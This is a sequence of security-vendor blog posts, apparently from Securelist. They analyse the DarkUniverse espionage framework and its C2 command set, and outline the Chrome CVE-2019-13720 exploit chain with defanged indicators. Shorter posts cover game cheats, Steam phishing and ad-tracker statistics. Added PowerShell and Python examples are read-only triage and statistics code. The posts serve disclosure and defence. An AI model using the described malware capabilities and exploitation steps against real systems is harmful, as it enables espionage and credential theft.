In April 2017, ShadowBrokers published their well-known ‘Lost in Translation’ leak, which, among other things, contained an interesting script that checked for traces of other APTs in the compromised system.

In 2018, we found an APT described as the 27th function of this script, which we call ‘DarkUniverse’. This APT was active for at least eight years, from 2009 until 2017. We assess with medium confidence that DarkUniverse is a part of the ItaDuke set of activities due to unique code overlaps. ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server URLs.

Technical details

Infection vector

Spear phishing was used to spread the malware. A letter was prepared separately for each victim to grab their attention and prompt them to open an attached malicious Microsoft Office document.

Each malware sample was compiled immediately before being sent and included the latest available version of the malware executable. Since the framework evolved from 2009 to 2017, the last releases are totally different from the first ones, so the current report details only the latest available version of the malware used until 2017.

The executable file embedded in the documents extracts two malicious files from itself, updater.mod and glue30.dll, and saves them in the working directory of the malware – %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Reorder.

After that, it copies the legitimate rundll32.exe executable into the same directory and uses it to run the updater.mod library.

The updater.mod module

This module is implemented as a dynamic-link library with only one exported function, called callme@16. It is responsible for communication with the C2 server, for maintaining malware integrity and the persistence mechanism, and for managing the other malware modules.

The persistence mechanism is provided by a link file, which is placed by updater.mod into the startup folder, ensuring malware execution after a reboot. If the link file becomes corrupted, the updater.mod module restores it.

Communication with C2

In this campaign the C2 servers were mostly based on cloud storage at mydrive.ch. For every victim, the operators created a new account there and uploaded additional malware modules and a configuration file with commands for the malware to execute. Once executed, the updater.mod module connected to the C2 and performed the following actions:

  • downloaded the command file to the working directory;
  • uploaded files collected and prepared by additional malicious modules (if any) to the C2. These files were located in a directory called ‘queue’ or ‘ntfsrecover’ in the working directory. Files in this directory could have one of two extensions: .d or .upd depending on whether they had already been uploaded to the server or not.
  • downloaded additional malware modules:
    • dfrgntfs5.sqt – a module for executing commands from the C2;
    • msvcrt58.sqt – a module for stealing mail credentials and emails;
    • zl4vq.sqt – legitimate zlib library used by dfrgntfs5;
    • %victim_ID%.upe – optional plug-in for dfrgntfs5. Unfortunately, we were unable to obtain this file.

All malware modules are encrypted with a custom algorithm:

The credentials for the C2 account are stored in the configuration that is placed in the registry, but the updater.mod module also stores a copy as an encrypted string in the executable file. Also, the configuration specifies how often updater.mod polls the C2, supporting both an active mode and a partly active mode.

Malware configuration in the registry

The malware configuration is stored in the registry in the SOFTWARE\AppDataLow\GUI\LegacyP entry. Different values are detailed in the following table:

  • C1 – C2 domain.
  • C2 – C2 domain path.
  • C3 – C2 credential username.
  • C4 – C2 credential password.
  • install – 1 if malware is installed.
  • TL1 – DESACTIVAR | HABILITAR; specifies whether the msvcrt58 and glue libraries are active.
  • TL2, TL3 – If TL1 is not NULL, they specify the time bounds within which the TL1 option is applied.
  • “kl” – If 1, updater.mod should download msvcrt58.sqt from the C2 again.
  • “re” – If 1, updater.mod should download dfrgntfs5.sqt from the C2 again.
  • “de” – If not 0, the framework should uninstall itself.
  • “cafe” – REDBULL | SLOWCOW; specifies how often updater.mod polls the C2.
  • “path” – Path to the folder from which files are being sent to the C2.
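The registry configuration above can be read back into an operator-readable state during triage, alongside the working directory and startup link described in the preceding sections. The script below is an added example, not code from the Securelist post; it assumes the LegacyP key lives under HKCU (the post does not name the hive, so HKLM is checked as well), the working directory %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Reorder, and its function names and output fields are its own.

```powershell
# Added triage script (not part of the Securelist post). Read-only.
function Read-DarkUniverseConfig {
    param([string]$SubKey = 'SOFTWARE\AppDataLow\GUI\LegacyP')  # from the post; hive assumed
    foreach ($hive in 'HKCU:', 'HKLM:') {
        $key = Join-Path $hive $SubKey
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $v = Get-ItemProperty -LiteralPath $key
        # Post: TL1 = DESACTIVAR | HABILITAR toggles the keylogger (glue30.dll) and
        # the POP3 sniffer (msvcrt58.sqt); TL2/TL3 bound the time when TL1 applies.
        $capture = switch ($v.TL1) {
            'HABILITAR'  { 'enabled' }
            'DESACTIVAR' { 'disabled' }
            default      { 'unset' }
        }
        $window = if ($v.TL1) { "$($v.TL2)-$($v.TL3)" } else { '' }
        # Post: cafe = REDBULL (active polling) | SLOWCOW (slow mode).
        $polling = switch ($v.cafe) {
            'REDBULL' { 'active' }
            'SLOWCOW' { 'slow' }
            default   { "unknown ($($v.cafe))" }
        }
        [pscustomobject]@{
            Hive              = $hive
            Installed         = ($v.install -eq 1)
            C2                = "$($v.C1)/$($v.C2)"   # C4 (password) deliberately not printed
            C2User            = $v.C3
            CaptureModules    = $capture
            CaptureWindow     = $window
            Polling           = $polling
            RedownloadMail    = ($v.kl -eq 1)          # msvcrt58.sqt will be fetched again
            RedownloadCommand = ($v.re -eq 1)          # dfrgntfs5.sqt will be fetched again
            UninstallPending  = ($null -ne $v.de -and $v.de -ne 0)
            ExfilPath         = $v.path
        }
    }
}

function Test-DarkUniverseWorkingDir {
    # Working directory from the post; the module file names below are also from the post.
    param([string]$Dir = (Join-Path $env:APPDATA 'Microsoft\Windows\Reorder'))
    $result = [ordered]@{ Directory = $Dir; Present = (Test-Path -LiteralPath $Dir) }
    if (-not $result.Present) { return [pscustomobject]$result }
    $known = 'updater.mod', 'glue30.dll', 'dfrgntfs5.sqt', 'msvcrt58.sqt', 'zl4vq.sqt', 'rundll32.exe'
    $files = Get-ChildItem -LiteralPath $Dir -File -Force -ErrorAction SilentlyContinue
    # %victim_ID%.upe has a victim-specific name, so it is matched by extension.
    $result.Modules = @($files | Where-Object { $known -contains $_.Name -or $_.Extension -eq '.upe' } |
        ForEach-Object Name)
    # Post: collected data waits in 'queue' or 'ntfsrecover' as .d / .upd files.
    $result.StagedFiles = @(foreach ($q in 'queue', 'ntfsrecover') {
        Get-ChildItem -LiteralPath (Join-Path $Dir $q) -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.d', '.upd' } | ForEach-Object FullName
    })
    # Post: persistence is a link file in the Startup folder that updater.mod restores if damaged.
    $shell = New-Object -ComObject WScript.Shell
    $result.StartupLinks = @(Get-ChildItem -LiteralPath ([Environment]::GetFolderPath('Startup')) `
        -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
            $s = $shell.CreateShortcut($_.FullName)
            if ("$($s.TargetPath) $($s.Arguments)" -match 'updater\.mod|\\Reorder\\') { $_.FullName }
        })
    return [pscustomobject]$result
}

Read-DarkUniverseConfig | Format-List
Test-DarkUniverseWorkingDir | Format-List
```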


Modules glue30.dll and msvcrt58.sqt

The glue30.dll malware module provides keylogging functionality. The updater.mod module uses the Win API function SetWindowsHookExW to install hooks for the keyboard and to inject glue30.dll into processes that get keyboard input. After that, glue30.dll loads and begins intercepting input in the context of each hooked process.

The msvcrt58.sqt module intercepts unencrypted POP3 traffic to collect email conversations and victims’ credentials. This module looks for traffic from the following processes:

  • outlook.exe;
  • winmail.exe;
  • msimn.exe;
  • nlnotes.exe;
  • eudora.exe;
  • thunderbird.exe;
  • thunde~1.exe;
  • msmsgs.exe;
  • msnmsgr.exe.

The malware parses intercepted POP3 traffic and sends the result to the main module (updater.mod) for uploading to the C2. This is done by hooking the following network-related Win API functions:

  • ws2_32.connect;
  • ws2_32.send;
  • ws2_32.recv;
  • ws2_32.WSARecv;
  • ws2_32.closesocket.


The dfrgntfs5.sqt module

This is the most functional component of the DarkUniverse framework. It processes an impressive list of commands from the C2, which are listed in the following table.

  • VER – Sends malware version to server.
  • DESINSTALAR – Uninstalls itself.
  • PANTALLA – Takes screenshot of the full screen and saves it to the \queue folder.
  • CAN_TCP, CAN_HTTP, CAN_HTTPS – Injects a shellcode into IE that establishes a direct connection with the C2, downloads additional code, sends info about the download results to the C2 and executes the downloaded code.
  • MET_TCP, MET_HTTPS – Also injects a shellcode into IE. The only difference with the previous command set is that in this case the shellcode doesn’t send any additional info to the C2 – it only establishes the connection, downloads additional code and executes it.
  • CAN_HTTP_LSASS – Injects the same shellcode as in the case of CAN_HTTP into the LSASS.exe process.
  • SCAN/STOPSCAN – Starts/stops network scan. Collects lots of different info about the local network.
  • CREDSCAN – Brute-forces IP range with specified username and password.
  • ACTUALIZAR – Updates dfrgntfs5.sqt.
  • ACTUALIZARK – Updates msvcrt58.sqt.
  • SYSINFO – Collects full system info.
  • REDBULL – Sets cafe flag to 1 (active).
  • SLOWCOW – Sets cafe flag to 0 (slow mode).
  • X – Runs specified process and logs its output, then prepares this output log for uploading to the C2.
  • T – Obtains list of files from a specific directory.
  • TAUTH – Obtains list of files of remote server if specified credentials are valid.
  • G – Sends a file to the C2.
  • GAUTH – Downloads a particular file from a shared resource if specified credentials are valid.
  • SPLIT – Splits file into 400 KB parts and uploads them to the C2.
  • FLUSH – Sends file with the data collected by all components that day and deletes it.
  • C1, C2, C3, C4 – Sets the C2 in its configuration in the registry.
  • TL1, TL2, TL3 – Sets the active state in its configuration in the registry.
  • ONSTART – Sets process to be started every malware startup.
  • CLEARONSTART – Undoes previous ONSTART command.
  • ARP – Runs unavailable ARP module (uncparse.dll – unavailable). This module stores data in a file internally named arpSniff.pcap.
  • AUTO – Automatically looks for updates of predefined files.
  • MANUAL – Files in the specified directory are searched using the *.upd pattern; all found files are deleted.
  • REGDUMP – Collects information from the registry.
  • PWDDUMP – Collects and decrypts credentials from Outlook Express, Outlook, Internet Explorer, Windows Mail and Windows Live Mail, Windows Live Messenger, and also Internet Cache.
  • LOGHASH – Injects process into lsass.exe and starts collecting password hashes in the file checksums.bk.
  • SENDLOGHASH – Sends collected lsass.exe process password hashes to the C2.
  • PROXYINFO – Checks if credentials for proxy are valid.
  • DHCP – Sets DHCP settings for local machine.
  • DNS – Sets DNS settings for local machine.
  • FAKESSL – Provides basic MITM functionality.



We recorded around 20 victims geolocated in Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus and the United Arab Emirates. The victims included both civilian and military organizations. We believe the number of victims during the main period of activity between 2009 and 2017 was much greater.


DarkUniverse is an interesting example of a full cyber-espionage framework used for at least eight years. The malware contains all the necessary modules for collecting all kinds of information about the user and the infected system and appears to be fully developed from scratch. Due to unique code overlaps, we assume with medium confidence that DarkUniverse’s creators were connected with the ItaDuke set of activities. The attackers were resourceful and kept updating their malware during the full lifecycle of their operations, so the observed samples from 2017 are totally different from the initial samples from 2009. The suspension of its operations may be related to the publishing of the ‘Lost in Translation’ leak, or the attackers may simply have decided to switch to more modern approaches and start using more widely available artefacts for their operations.

Appendix I – Indicators of Compromise

A full set of IOCs, including YARA rules, is available to customers of the Kaspersky Intelligence Reporting service. For more information, contact intelreports@kaspersky.com

November 1, 2019

Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium

Executive summary

Kaspersky Exploit Prevention is a component of Kaspersky products that has successfully detected a number of zero-day attacks in the past. Recently, it caught a new, unknown exploit for Google’s Chrome browser. We promptly reported this to the Google Chrome security team. After reviewing the PoC we provided, Google confirmed there was a zero-day vulnerability and assigned it CVE-2019-13720. Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux, and we recommend that all Chrome users update to this latest version as soon as possible! You can read Google’s bulletin for details.

Kaspersky endpoint products detect the exploit with the help of the exploit prevention component. The verdict for this attack is Exploit.Win32.Generic.

We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.

More details about CVE-2019-13720 and recent DarkHotel false flag attacks are available to customers of Kaspersky Intelligence Reporting. For more information, contact: intelreports@kaspersky.com.

Technical details

The attack leverages a waterhole-style injection on a Korean-language news portal. Malicious JavaScript code was inserted in the main page, which in turn loads a profiling script from a remote site.

Redirect to the exploit landing page

The main index page hosted a small JavaScript tag that loaded a remote script from hxxp://code.jquery.cdn.behindcorona[.]com/.

The script then loads another script named .charlie.XXXXXXXX.js. This JavaScript checks whether the victim’s system can be infected by examining the browser’s user agent: the browser should be running on a 64-bit version of Windows and not be a WOW64 process; it also tries to get the browser’s name and version. The exploit targets a bug in the Google Chrome browser, and the script checks that the version is greater than or equal to 65 (the current Chrome version is 78):

Chrome version checks in the profiling script (.charlie.XXXXXXXX.js)

If the browser version checks out, the script starts performing a number of AJAX requests to the attacker-controlled server (behindcorona[.]com), where the path name points to the argument that is passed to the script (xxxxxxx.php). The first request is necessary to obtain some important information for further use. This information includes several hex-encoded strings that tell the script how many chunks of the actual exploit code should be downloaded from the server, as well as a URL to an image file that embeds a key for the final payload, and an RC4 key to decrypt these chunks of exploit code.

Exploitation chain – AJAX requests to xxxxxxx.php

After downloading all the chunks, the script RC4-decrypts and concatenates all the parts, which gives the attacker new JavaScript code containing the full browser exploit. To decrypt the parts, the previously retrieved RC4 key is used.

One more version check

The browser exploit script is obfuscated; after de-obfuscation we observed a few peculiar things:

  1. Another check is made against the user agent’s string – this time it checks that the browser version is 76 or 77. It could mean that the exploit authors have only worked on these versions (a previous exploitation stage checked for version number 65 or newer) or that other exploits have been used in the past for older Chrome versions.

    Obfuscated exploit code

  2. There are a few functions that operate on the browser’s built-in BigInt class, which is useful for doing 64-bit arithmetic inside JavaScript code, for example, to work with native pointers in a 64-bit environment. Usually, exploit developers implement their own functions for doing this by working with 32-bit numbers. However, in this case, BigInt is used, which should be faster because it’s implemented natively in the browser’s code. The exploit developers don’t use all 64 bits here, but instead operate on a smaller range of numbers. This is why they implement a few functions to work with the higher/lower parts of the number.

    Snippet of code to work with 64-bit numbers

  3. There are many functions and variables that are not used in the actual code. This usually means that they were used for debugging code and were then left behind when the code was moved to production.
  4. The majority of the code uses several classes related to a certain vulnerable component of the browser. As this bug has still not been fixed, we are not including details about the specific vulnerable component here.
  5. There are a few big arrays with numbers that represent a shellcode block and an embedded PE image.

The analysis we have provided here is deliberately brief due to vulnerability disclosure principles. The exploit used a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker a Use-After-Free (UaF) condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.

The exploit first tries to trigger UaF to perform an information leak about important 64-bit addresses (as a pointer). This results in a few things: 1) if an address is leaked successfully, it means the exploit is working correctly; 2) a leaked address is used to know where the heap/stack is located and that defeats the address space layout randomization (ASLR) technique; 3) a few other useful pointers for further exploitation could be located by searching near this address.

After that it tries to create a bunch of large objects using a recursive function. This is done to create a deterministic heap layout, which is important for successful exploitation. At the same time, it attempts to utilize a heap spraying technique that aims to reuse the same pointer that was freed earlier in the UaF part. This trick could be used to cause confusion and give the attacker the ability to operate on two different objects (from a JavaScript code perspective), though in reality they are located in the same memory region.

The exploit attempts to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. This is used to craft a special object that can be used with WebAssembly and FileReader together to perform code execution for the embedded shellcode payload.

First stage shellcode

Payload description

The final payload is downloaded as an encrypted binary (worst.jpg) that is decrypted by the shellcode.

Encrypted payload – worst.jpg

After decryption, the malware module is dropped as updata.exe to disk and executed. For persistence the malware installs tasks in Windows Task Scheduler.

The payload ‘installer’ is a RAR SFX archive, with the following information:

File size: 293,403
MD5: 8f3cd9299b2f241daf1f5057ba0b9054
SHA256: 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd

The archive contains two files:

File name: iohelper.exe
MD5: 27e941683d09a7405a9e806cc7d156c9
SHA256: 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48

File name: msdisp64.exe
MD5: f614909fbd57ece81d00b01958338ec2
SHA256: cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb

Both files were compiled at the same time, which, if the timestamp is to be believed, was “Tue Oct 8 01:49:31 2019”.

The main module (msdisp64.exe) tries to download the next stage from a hardcoded C2 server set. The next stages are located on the C2 server in folders with the victim computer names, so the threat actors have information about which machines were infected and place the next-stage modules in specific folders on the C2 server.

More details about this attack are available to customers of Kaspersky Intelligence Reporting. For more information, contact: intelreports@kaspersky.com.


November 1, 2019

The cake is a lie! Uncovering the secret world of malware-like cheats in video games

In 2018, the video game industry became one of the most lucrative in the world, generating $43.4 billion in revenue within the United States alone. When we consider that video game licenses are only a fraction of the total market, it becomes clear just how important the industry is compared to the movie and music industries, for example. Moreover, conservative estimates put global revenue for the gaming industry at over $130 billion for the past year, placing it ahead of Hollywood and the blockbusters premiering worldwide.

An entire ecosystem has sprung up around the gaming industry, electronic sports, or eSports, being one of the main attractions for audiences eager to watch teams or individuals play against each other in tournaments broadcast on cable television. With nearly 400 million viewers each year, and more being added via streaming platforms such as Twitch or Mixer, eSports and the mainstream media have found a balance between both worlds, recognizing that there’s huge business potential in these competitions.

With crowdfunded prizes that have reached $30 million, eSports brings together teams from all over the world to compete in different multiplayer games.

Stereotypes and urban myths would have you believe video games are only played by a certain type of individual, but recent research presented by ESA (Entertainment Software Association) indicates that in the US the average gamer is 34 years old, and women make up 45% of the gaming demographic. Currently, one of the main factors when deciding which video game to purchase is the online gameplay capability, a feature that provides players with a competitive arena to test their abilities against equally ranked opponents and enables developers and publishers to charge a subscription fee.

While difficult to understand for some, the popularity of video games is no accident. Designers specifically craft rewards systems that keep the players hooked long enough until they can receive their next ‘hit.’ Online worlds provide the novelty that humans seek, all within a controlled environment that anyone can join on demand. While the psychology involved in creating an addictive video game is outside the scope of this research, it’s important to understand why these virtual worlds present such a fragile equilibrium that can easily be broken when players seek to gain an unfair advantage over their opponents.

Usually sold in a subscription model, private cheats can cost anything from 10 to several hundred dollars, exceeding a game’s original retail price several fold.

Although cheats in video games have been around since the early days of the industry, it wasn’t until cheat codes appeared that they attracted the attention of enthusiasts wanting to make their gaming sessions easier or harder, depending on the cheat used. A popular cheat named the Konami Code, created by Kazuhisa Hashimoto while porting the game Gradius to the NES (Nintendo Entertainment System) in 1986, is considered one of the first of its kind. This code enabled the developer to lower the game’s difficulty by giving the player additional resources, making testing of the game much easier. A lot has happened since those days, and we can now encounter cheats that demonstrate malware-like behavior, using anti-detection techniques and evasion features that rival those used in rootkits and implants found in advanced persistent threats.

This paper will address the following questions, inspired by the Five Ws investigative methodology:

  • What is video game cheating? How does it affect the video game industry and other players?
  • Why do individuals cheat? Is there a virtual economy around trading cheats? If so, how big is it?
  • Who is developing cheats and who is using them? What types of cheats currently exist?
  • When and where are cheats used? Can these programs be profiled or detected? What techniques can be used?
  • How do cheats work? How do they avoid detection by developers and publishers? Is there really an arms race between two sides in the video game world?

Read the full report (PDF) to discover the answers.


October 28, 2019

Steam-powered scammers

Digital game distribution services have not only simplified the sale of games themselves, but provided developers with additional monetization levers. For example, in-game items, such as skins, equipment, and other character-enhancing elements, as well as those that help a player stand out, can be sold for real money. Users themselves can also sell items to each other, with the rarest fetching several thousand dollars. And where there’s money, there’s fraud. Scammers try to get hold of login details to “strip” the victim’s characters and sell off their hard-earned items for a juicy sum.

One of the most popular platforms among users (and hence cybercriminals) is Steam, and we’ve been observing money-making schemes to defraud its users for quite some time. Since June, however, such attacks have become more frequent and, compared to previous attempts, far more sophisticated.


Steam phishing attacks, January 2019 – September 2019

It all starts with an online store

Like many others, the scam we uncovered is phishing-based. Attackers lure users to websites that mimic or copy online stores — in this case, the ones linked to Steam — that sell in-game items. The fake resources are high-quality and it is really hard, sometimes even impossible, to distinguish them from the real thing. Such phishing sites:

  • Are very well implemented, no matter if copied or made from scratch
  • Have a security certificate and support HTTPS
  • Issue a warning about the use of cookies
  • Provide some links to the original website (that go nowhere when clicked)

The longer a user spends on the site, the more likely they are to spot something odd. Therefore the scammers do not want users to stay long, and phishing sites get down to business very quickly: on clicking any link, the user immediately sees a window asking for their Steam login and password. By itself, this might not raise a red flag. The practice of logging into a service through another account (Facebook, Google, etc.) is quite common, and Steam accounts can likewise be used to log into third-party resources. All the more so since the supposed trading platform requires access to the user’s account to obtain data on what items they have.

The fake login/password window is very similar to the real one: the address bar contains the correct URL of the Steam portal, the page has an adaptive layout, and if the user opens the link in another browser with a different interface language, the content and title of the fake page change in accordance with the new “locale.”

However, right-clicking on the title of this window (or control elements) displays the standard context menu for web pages, and selecting “view code” exposes the window as a fake, implemented using HTML and CSS:

In one example, the username and password are transferred using the POST method through an API on another domain that also belongs to scammers.

The fake login form is given extra credence by the fact that the entered data is verified using the original services. On entering the wrong login and password, the user is shown an error message:

When a valid login and password pair is entered, the system requests a two-factor authorization code that is sent by email or generated in the Steam Guard app. Obviously, the entered code is also forwarded to the scammers, who gain full control over the account as a result:

Other varieties

Besides creating “complex” login windows using HTML and CSS, cybercriminals also employ the good-old trick of a fake form in a separate window, but with an empty address value. Although the window display method is different, the operating principle is the same as above. The form verifies the entered data, and if the login and password match, it prompts the victim to enter a two-factor authorization code.

How to stay protected

The main tips for guarding against this and similar scams are essentially no different from those for identifying “ordinary” phishing sites. Look carefully at the address bar and its contents. In our example, it contained the correct URL, but less sophisticated variants are more common — for example, the website address might not match the store name, or might display the words “about:blank”.

Pay close attention to login forms on “external” resources. Right-click on the title bar of the window containing the form, or try to drag it outside the main browser window, to make sure it is not fake. If you suspect that the login window is not real, open the Steam main page in a new browser window and log into your account from there. Then go back to the suspicious login form and refresh the page. If it is real, a message will appear saying that you are already logged in.

If everything seems normal, but something still arouses suspicion, check the domain using WHOIS. Genuine companies do not register domains for short periods and do not hide their contact details. Lastly, activate two-factor authentication through Steam Guard, follow Steam’s own recommendations, and use a security solution with anti-phishing technology.

October 23, 2019

Data collectors

Who owns data owns the world. And with the Internet taking over much of our daily lives, it has become far easier and faster to receive, collect, and analyze data.

The average user cannot even imagine how much data gets collected on them. Besides technical information (for example, about a smartphone) harvested by a manufacturer to patch vulnerabilities, companies also collect and analyze user behavior patterns, including interests, lifestyle, hobbies, and habits. And whereas a few years ago the phrase “Marketers rule our lives” sounded like some kind of Masonic conspiracy theory, today it is an obvious truth. All our online movements and actions on websites are, in their totality, a valuable product.

Why is it important for marketing and advertising agencies to know so much about us? Simple. The more data they have on us, the more accurately we can be assigned to a particular consumer group. And the more nuances about the consumer group are known, the more precisely and efficiently it can be targeted with advertising or new products that meet (or anticipate) its needs.

That is why companies that harvest and analyze data are keen to have up-to-date information about consumer preferences. And that is also why almost all websites deploy trackers that collect information about what users are doing there, what goods they are looking at, etc. All this is relevant not only to the world of sales and advertising, but to our social and political lives, too — trackers on news sites, for example, might potentially manipulate our opinions by tracking our interests and offering news of a certain kind.

That said, the majority of tracking campaigns are aimed specifically at showing ads to a range of target audiences. Many companies around the world collect and analyze data and provide full-cycle advertising services, but precious few of them are giants, yet those few account for most of the data collected. Besides the global giants there are regional ones, which sometimes collect even more information than their international counterparts (a sign of a fairly independent online space in that region).

Such regions and countries are usually distinguished by their language. In Russian-speaking countries trackers from Russian companies dominate; in China the same goes for Chinese firms, as it does for Japanese, Korean, and Czech companies in their respective countries. A deeper look reveals connections between some of these regions: the Top 25 list of trackers in Russia, for example, features Chinese solutions. By analyzing statistics from different regions and countries, we can therefore infer which companies hold the most data about which regions.

How the statistics were collected

For this report we used anonymous statistics collected during the September 2018 – September 2019 period from the Do Not Track (DNT) component, which prevents the loading of tracking elements that monitor user actions on websites. The 100% reference value was all DNT triggerings for all trackers in each region or country. DNT is part of Kaspersky Internet Security, Kaspersky Total Security and Kaspersky Security Cloud solutions, and is disabled by default.
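To make the reference value concrete, here is an added example (not Kaspersky's DNT code) of how per-region shares of the kind reported below are computed from anonymous blocking events: each blocked host is attributed to a tracker by domain suffix, counts are taken per region, and 100% is the total of triggerings for all trackers in that region. The tracker domain list and the events are constructed for illustration.

```python
"""Reproduce the article's share calculation from anonymous DNT-style
blocking events. Added example; the tracker signature list and the events
are constructed for illustration, not Kaspersky's real DNT data."""
from collections import Counter, defaultdict

# Constructed owner map: a blocked host is attributed to the tracker whose
# domain it equals or sits under (longest suffix wins).
TRACKER_DOMAINS = {
    "doubleclick.net": "DoubleClick",
    "google-analytics.com": "Google Analytics",
    "facebook.net": "Facebook",
    "mc.yandex.ru": "Yandex.Metrica",
}


def tracker_for_host(host: str):
    """Map a blocked host to a tracker name, or None if it is not on the list."""
    host = host.lower().rstrip(".")
    best = None
    for domain, name in TRACKER_DOMAINS.items():
        if host == domain or host.endswith("." + domain):
            if best is None or len(domain) > len(best[0]):
                best = (domain, name)
    return best[1] if best else None


def tracker_shares(events):
    """events: iterable of (region, blocked_host). Returns
    {region: {tracker: share_percent}}; within a region the shares sum to 100,
    the article's '100% = all DNT triggerings for all trackers' reference."""
    counts = defaultdict(Counter)
    for region, host in events:
        name = tracker_for_host(host)
        if name is not None:          # hosts outside the list are not triggerings
            counts[region][name] += 1
    shares = {}
    for region, c in counts.items():
        total = sum(c.values())
        shares[region] = {name: round(100 * n / total, 1) for name, n in c.items()}
    return shares


def top_trackers(shares, region, n=25):
    """The Top-N table the article prints per region, highest share first."""
    ranked = sorted(shares.get(region, {}).items(), key=lambda kv: (-kv[1], kv[0]))
    return ranked[:n]


# Constructed events: (region, host the DNT component blocked).
SAMPLE_EVENTS = [
    ("North America", "stats.g.doubleclick.net"),
    ("North America", "ad.doubleclick.net"),
    ("North America", "www.google-analytics.com"),
    ("North America", "connect.facebook.net"),
    ("CIS", "mc.yandex.ru"),
    ("CIS", "mc.yandex.ru"),
    ("CIS", "ad.doubleclick.net"),
    ("CIS", "cdn.example.com"),        # not a tracker host: ignored
]

if __name__ == "__main__":
    shares = tracker_shares(SAMPLE_EVENTS)
    for region in shares:
        print(region, top_trackers(shares, region, 3))
```

Because shares are relative to a region's own total, a tracker's percentage says how much of that region's blocked tracking it accounts for, not how many users it reached; that is why the article compares regions by share rather than by raw counts.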

Tracking services

First, we will look at the biggest trackers, which according to our statistics are found in almost every country or occupy the top spots in their home region. Jumping ahead, we will say that almost all of them belong to multinational giants.

DoubleClick

Google controls the world’s largest advertising network, DoubleClick (see our post explaining how online advertising works for more on advertising networks); in 2018 Google announced plans to rebrand the platform and merge it with its own advertising ecosystem. Google can therefore be considered the world’s largest harvester of user data at present, a point we will return to more than once in this article.

Besides DoubleClick, Google has several other trackers that form part of the company’s huge advertising network. The first is Google Analytics, which collects and provides visitor stats to resource owners. The second is Google AdWords, for placing ads, and the third is Google AdSense, for those who sell ads on their own resources.

To illustrate the reach of DoubleClick, here’s a chart that shows the share of DoubleClick and Google in each of the regions:


DoubleClick and Google’s share of triggerings in each of the regions, 02.2018 – 02.2019

The relatively small share in North America is due to the presence of other large-scale trackers in the local market, such as AOL Advertising and Moat.

AOL Advertising

AOL Advertising, an online advertising agency, is part of Oath Ad Platforms, owned by Verizon Media (a subsidiary of Verizon Communications). The AOL Advertising tracker is found in all regions and countries.


AOL Advertising’s share of triggerings in each of the regions, 02.2018 – 02.2019

Moat

US company Moat not only does advertising, but also collects and analyzes user data, including heatmap analytics (tracking cursor movements on an ad or website to analyze and identify user behavior).


AppNexus

AppNexus is a US advertising agency that, like other tech firms engaged in advertising, collects and analyzes user data to show targeted advertising. Based on our data, AppNexus has the largest share in the Oceania and Asia regions:


Adloox

Adloox is a French company that offers efficiency verification and other analysis for ads. The largest share of Adloox tracking fell to the Oceania region:


YouTube Analytics

This tracker collects data on video viewings, and thus helps show relevant videos and ads to users.


Facebook

This tracker is located mainly on Facebook pages. What’s more, the company has another tool that we consider a separate entity — Facebook Custom Audience. It uses a tracking pixel embedded in pages to monitor standard events, custom actions, and custom conversions.


Note that in countries where Facebook is most popular, the Facebook tracker performs better than the Custom Audience tracker.

ScorecardResearch

This company does market research, harvesting user data on different websites. Its largest share is in Latin America.


Yahoo Advertising

Like AOL Advertising, this tracker is owned by Verizon, and places personalized ads in Yahoo search results and other pages of the service. Additionally, the company provides the Yahoo Web Analytics service, which allows users to analyze visitor behavior on their websites. It should be said that Yahoo services are very popular in the Asia region, especially Japan.


Mail.ru Group

Mail.ru Group trackers are mainly distributed in the Russian-language segment of the Internet. They are found not only on the pages of Mail.ru services, but on the vast majority of websites in Russian. Mail.ru Group and Google are the two largest players in the CIS.


Yandex.Metrica

Another tracker often encountered in CIS countries is Yandex.Metrica from Russian online firm Yandex. The tracker analyzes user behavior and evaluates website traffic, which involves the collection and analysis of user data and audience profiling and modeling. This company’s trackers are very often found on Russian-language resources.


Regions

North America

To start with, let’s take a look at the situation in the homeland of the largest multinational tech firms, whose trackers we detected through DNT.

For convenience, instead of a graph, we give tables of the Top 25 trackers for each region.

As we see, first place in North America (Canada, US) goes to the company that appears in every regional top list and in every country covered in this article — the giant DoubleClick. The most popular sites in North America on which this tracker is used are youtube.com, kijiji.ca, msn.com, ebay.com, zillow.com, weather.com, macys.com, kohls.com, and facebook.com.

In second place in North America is AOL Advertising; this tracker was blocked most frequently by our users on msn.com, xfinity.com, aol.com (naturally), weather.com, kijiji.ca, and thegamer.tv.

Moat trackers came third. They are encountered most often on msn.com, aol.com, espn.com, hulu.com, cnn.com, foxnews.com, thestar.com, and kijiji.ca.


Europe

In Europe (Austria, Belgium, Czech Republic, Denmark, France, Germany, Hungary, Ireland, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, Spain, Sweden, Switzerland, UK), with its different language segments, the situation is not as clear-cut as in North America. However, the giants still lead the pack.


First and second positions go to DoubleClick and Google Analytics, while third belongs to the Amazon Technologies tracker, which analyzes buying activity on the company’s websites and serves ads for its products on partner sites. Looking at its share in different regions, we see that Europe claims the largest percentage, followed by North America.


Unsurprisingly, we detected this tracker most often on amazon.de. Next come amazon.co.uk, amazon.it, amazon.es, and amazon.fr. Besides Amazon’s native sites, this tracker is also found on libero.it, orange.fr, web.de, dailymail.co.uk, bild.de, and imdb.com.

Not all countries in the Europe region are topped by DoubleClick. For example, an exception is the Czech Republic, where our solutions most often blocked trackers from Seznam.cz — a local portal with a search engine where ads are placed.


Oceania

Another largely English-speaking region is Oceania (Australia, New Zealand). As expected, the picture here is similar to North America and Europe.


